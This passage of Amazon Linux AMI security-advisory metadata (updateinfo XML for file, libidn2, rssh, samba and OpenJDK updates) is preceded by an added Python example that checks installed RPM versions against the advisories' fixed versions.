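The pkglist entries in each advisory give the fixed epoch, version and release for every package the update ships; deciding whether a host is actually patched means comparing the installed epoch/version/release against those values with RPM's own version ordering, not a string comparison. The following Python is an added example and is not part of the Amazon Linux metadata or of yum: it parses the updateinfo format shown on this page, implements rpmvercmp-style segment ordering (the tilde and caret rules of librpm are deliberately omitted and noted in the code), and reports which advisories still apply to an inventory. The sample advisory is constructed in code and mirrors the file packages of ALAS-2019-1326; the "installed" versions are invented for the demonstration.

```python
"""Match updateinfo.xml advisories against installed RPM epoch/version/release.

Added example, not Amazon Linux or yum code. The sample advisory is built in
code (it mirrors ALAS-2019-1326 for the file package) and the installed
inventory below is constructed for the demo.
"""
import re
import xml.etree.ElementTree as ET


def _rpm_segments(s):
    # rpmvercmp splits on non-alphanumerics into runs of digits and runs of letters
    return re.findall(r"[0-9]+|[a-zA-Z]+", s)


def rpmvercmp(a, b):
    """Return 1, 0 or -1 like librpm's rpmvercmp (tilde/caret handling omitted)."""
    if a == b:
        return 0
    sa, sb = _rpm_segments(a), _rpm_segments(b)
    for x, y in zip(sa, sb):
        xd, yd = x.isdigit(), y.isdigit()
        if xd != yd:
            # a numeric segment sorts newer than an alphabetic one
            return 1 if xd else -1
        if xd:
            xi, yi = int(x), int(y)   # numeric compare, so 18 is newer than 9
            if xi != yi:
                return 1 if xi > yi else -1
        elif x != y:
            return 1 if x > y else -1  # alphabetic segments compare as strings
    if len(sa) == len(sb):
        return 0
    return 1 if len(sa) > len(sb) else -1  # leftover segments win


def compare_evr(evr_a, evr_b):
    """Compare (epoch, version, release) tuples; epoch dominates, then version, then release."""
    ea, va, ra = evr_a
    eb, vb, rb = evr_b
    ea, eb = int(ea or 0), int(eb or 0)
    if ea != eb:
        return 1 if ea > eb else -1
    c = rpmvercmp(va, vb)
    if c != 0:
        return c
    return rpmvercmp(ra, rb)


def parse_updateinfo(xml_bytes):
    """Yield one dict per update element: id, severity, CVE ids and fixed packages."""
    root = ET.fromstring(xml_bytes)
    for upd in root.iter("update"):
        cves = [r.get("id") for r in upd.iter("reference") if r.get("type") == "cve"]
        pkgs = []
        for p in upd.iter("package"):
            pkgs.append((p.get("name"), p.get("arch"),
                         (p.get("epoch", "0"), p.get("version"), p.get("release"))))
        yield {"id": upd.findtext("id"), "severity": upd.findtext("severity"),
               "cves": cves, "packages": pkgs}


def missing_updates(advisories, installed):
    """installed maps (name, arch) -> (epoch, version, release).

    Returns {advisory id: set of package names} where the installed package is
    older than the fixed one. Packages not installed are skipped: an advisory
    for a package a host does not carry does not apply to it.
    """
    hits = {}
    for adv in advisories:
        for name, arch, fixed in adv["packages"]:
            have = installed.get((name, arch))
            if have is None:
                continue
            if compare_evr(have, fixed) == -1:
                hits.setdefault(adv["id"], set()).add(name)
    return hits


def build_sample_updateinfo():
    """Constructed sample mirroring the ALAS-2019-1326 entry (file 5.37-8.48.amzn1)."""
    updates = ET.Element("updates")
    upd = ET.SubElement(updates, "update", status="final", type="security")
    ET.SubElement(upd, "id").text = "ALAS-2019-1326"
    ET.SubElement(upd, "severity").text = "medium"
    refs = ET.SubElement(upd, "references")
    ET.SubElement(refs, "reference", id="CVE-2019-18218", type="cve")
    coll = ET.SubElement(ET.SubElement(upd, "pkglist"), "collection", short="amazon-linux-ami")
    for name in ("file", "file-libs", "python27-magic"):
        arch = "noarch" if name.startswith("python") else "x86_64"
        ET.SubElement(coll, "package", name=name, version="5.37",
                      release="8.48.amzn1", epoch="0", arch=arch)
    return ET.tostring(updates)


# Constructed inventory for the demo (the shape rpm -qa would give you):
INSTALLED = {
    ("file", "x86_64"): ("0", "5.37", "8.47.amzn1"),       # one release behind: vulnerable
    ("file-libs", "x86_64"): ("0", "5.37", "8.48.amzn1"),  # already at the fixed EVR
    # python27-magic is not installed, so its noarch entry is skipped
}


def demo():
    advisories = list(parse_updateinfo(build_sample_updateinfo()))
    return missing_updates(advisories, INSTALLED)


if __name__ == "__main__":
    print(demo())
```

On a real host the inventory comes from rpm -qa --qf '%{NAME} %{ARCH} %{EPOCHNUM} %{VERSION} %{RELEASE}\n' fed into the same dict. The ordering matters: a lexical compare ranks 1.9.amzn1 above 1.18.amzn1 and would report the older package as patched, and an epoch of 1 (as on the mod_ssl packages in this file) outranks any version with epoch 0.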
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18218" title="" id="CVE-2019-18218" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="file-libs" version="5.37" release="8.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.37-8.48.amzn1.x86_64.rpm</filename></package><package name="python27-magic" version="5.37" release="8.48.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-magic-5.37-8.48.amzn1.noarch.rpm</filename></package><package name="file-static" version="5.37" release="8.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.37-8.48.amzn1.x86_64.rpm</filename></package><package name="python26-magic" version="5.37" release="8.48.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-magic-5.37-8.48.amzn1.noarch.rpm</filename></package><package name="file-debuginfo" version="5.37" release="8.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.37-8.48.amzn1.x86_64.rpm</filename></package><package name="file" version="5.37" release="8.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.37-8.48.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.37" release="8.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.37-8.48.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.37" release="8.48.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.37-8.48.amzn1.i686.rpm</filename></package><package name="file-devel" version="5.37" release="8.48.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.37-8.48.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.37" release="8.48.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.37-8.48.amzn1.i686.rpm</filename></package><package name="file" version="5.37" release="8.48.amzn1" epoch="0" 
arch="i686"><filename>Packages/file-5.37-8.48.amzn1.i686.rpm</filename></package><package name="file-static" version="5.37" release="8.48.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.37-8.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1327</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1327: medium priority package update for libidn2</title><issued date="2019-12-13 21:13:00" /><updated date="2019-12-19 23:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18224:
idn2_to_ascii_4i in lib/lookup.c in GNU libidn2 before 2.1.1 has a heap-based buffer overflow via a long domain string.
99999:
CVE-2019-18224 libidn2: heap-based buffer overflow in idn2_to_ascii_4i in lib/lookup.c
CVE-2019-12290:
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290" title="" id="CVE-2019-12290" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18224" title="" id="CVE-2019-18224" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libidn2" version="2.3.0" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libidn2-2.3.0-1.4.amzn1.x86_64.rpm</filename></package><package name="libidn2-debuginfo" version="2.3.0" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libidn2-debuginfo-2.3.0-1.4.amzn1.x86_64.rpm</filename></package><package name="libidn2-devel" version="2.3.0" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libidn2-devel-2.3.0-1.4.amzn1.x86_64.rpm</filename></package><package name="idn2" version="2.3.0" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/idn2-2.3.0-1.4.amzn1.x86_64.rpm</filename></package><package name="libidn2-devel" version="2.3.0" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/libidn2-devel-2.3.0-1.4.amzn1.i686.rpm</filename></package><package name="libidn2-debuginfo" version="2.3.0" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/libidn2-debuginfo-2.3.0-1.4.amzn1.i686.rpm</filename></package><package name="idn2" version="2.3.0" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/idn2-2.3.0-1.4.amzn1.i686.rpm</filename></package><package name="libidn2" version="2.3.0" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/libidn2-2.3.0-1.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1328</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1328: important priority package update for rssh</title><issued date="2019-12-13 21:17:00" /><updated date="2019-12-19 
23:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3464:
99999:
CVE-2019-3463:
99999:
CVE-2019-1000018:
99999:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1000018" title="" id="CVE-2019-1000018" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3463" title="" id="CVE-2019-3463" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3464" title="" id="CVE-2019-3464" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rssh-debuginfo" version="2.3.4" release="15.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/rssh-debuginfo-2.3.4-15.3.amzn1.x86_64.rpm</filename></package><package name="rssh" version="2.3.4" release="15.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/rssh-2.3.4-15.3.amzn1.x86_64.rpm</filename></package><package name="rssh" version="2.3.4" release="15.3.amzn1" epoch="0" arch="i686"><filename>Packages/rssh-2.3.4-15.3.amzn1.i686.rpm</filename></package><package name="rssh-debuginfo" version="2.3.4" release="15.3.amzn1" epoch="0" arch="i686"><filename>Packages/rssh-debuginfo-2.3.4-15.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1329</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1329: medium priority package update for samba</title><issued date="2019-12-13 21:18:00" /><updated date="2019-12-19 18:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3880:
A flaw was found in the way samba implemented an RPC endpoint emulating the Windows registry service API. An unprivileged attacker could use this flaw to create a new registry hive file anywhere they have unix permissions which could lead to creation of a new file in the Samba share.
99999:
CVE-2019-3880 samba: save registry file outside share as unprivileged user
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3880" title="" id="CVE-2019-3880" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-devel" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package 
name="ctdb" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.9.1" release="6.46.amzn1" epoch="0" 
arch="noarch"><filename>Packages/samba-pidl-4.9.1-6.46.amzn1.noarch.rpm</filename></package><package name="samba-client-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.9.1" release="6.46.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.9.1-6.46.amzn1.noarch.rpm</filename></package><package name="samba-test-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.9.1-6.46.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.9.1" release="6.46.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.9.1" 
release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.9.1-6.46.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.9.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.9.1-6.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1330</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1330: important priority package update for java-1.8.0-openjdk</title><issued date="2020-01-06 23:06:00" /><updated date="2020-01-09 18:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2999:
Vulnerability in the Java SE product of Oracle Java SE (component: Javadoc). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE accessible data as well as unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 4.7 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N).
1760992:
CVE-2019-2999 OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765)
CVE-2019-2992:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1761146:
CVE-2019-2992 OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597)
CVE-2019-2989:
Vulnerability in the Oracle GraalVM Enterprise Edition product of Oracle GraalVM (component: Java). The supported version that is affected is 19.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM Enterprise Edition. While the vulnerability is in Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle GraalVM Enterprise Edition accessible data. CVSS 3.0 Base Score 6.8 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N).
1761601:
CVE-2019-2989 OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298)
CVE-2019-2988:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1760999:
CVE-2019-2988 OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292)
CVE-2019-2987:
Vulnerability in the Java SE product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 11.0.4 and 13. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1761149:
CVE-2019-2987 OpenJDK: Missing glyph bitmap image dimension check in FreetypeFontScaler (2D, 8225286)
CVE-2019-2983:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1761262:
CVE-2019-2983 OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915)
CVE-2019-2981:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JAXP). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1760980:
CVE-2019-2981 OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532)
CVE-2019-2978:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1761006:
CVE-2019-2978 OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892)
CVE-2019-2975:
No description is available for this CVE.
99999:
CVE-2019-2975 OpenJDK: Unexpected exception thrown during regular expression processing in Nashorn (Scripting, 8223518)
CVE-2019-2973:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JAXP). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2973 OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505)
1760978:
CVE-2019-2973 OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505)
CVE-2019-2964:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Concurrency). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2964 OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684)
1760963:
CVE-2019-2964 OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684)
CVE-2019-2962:
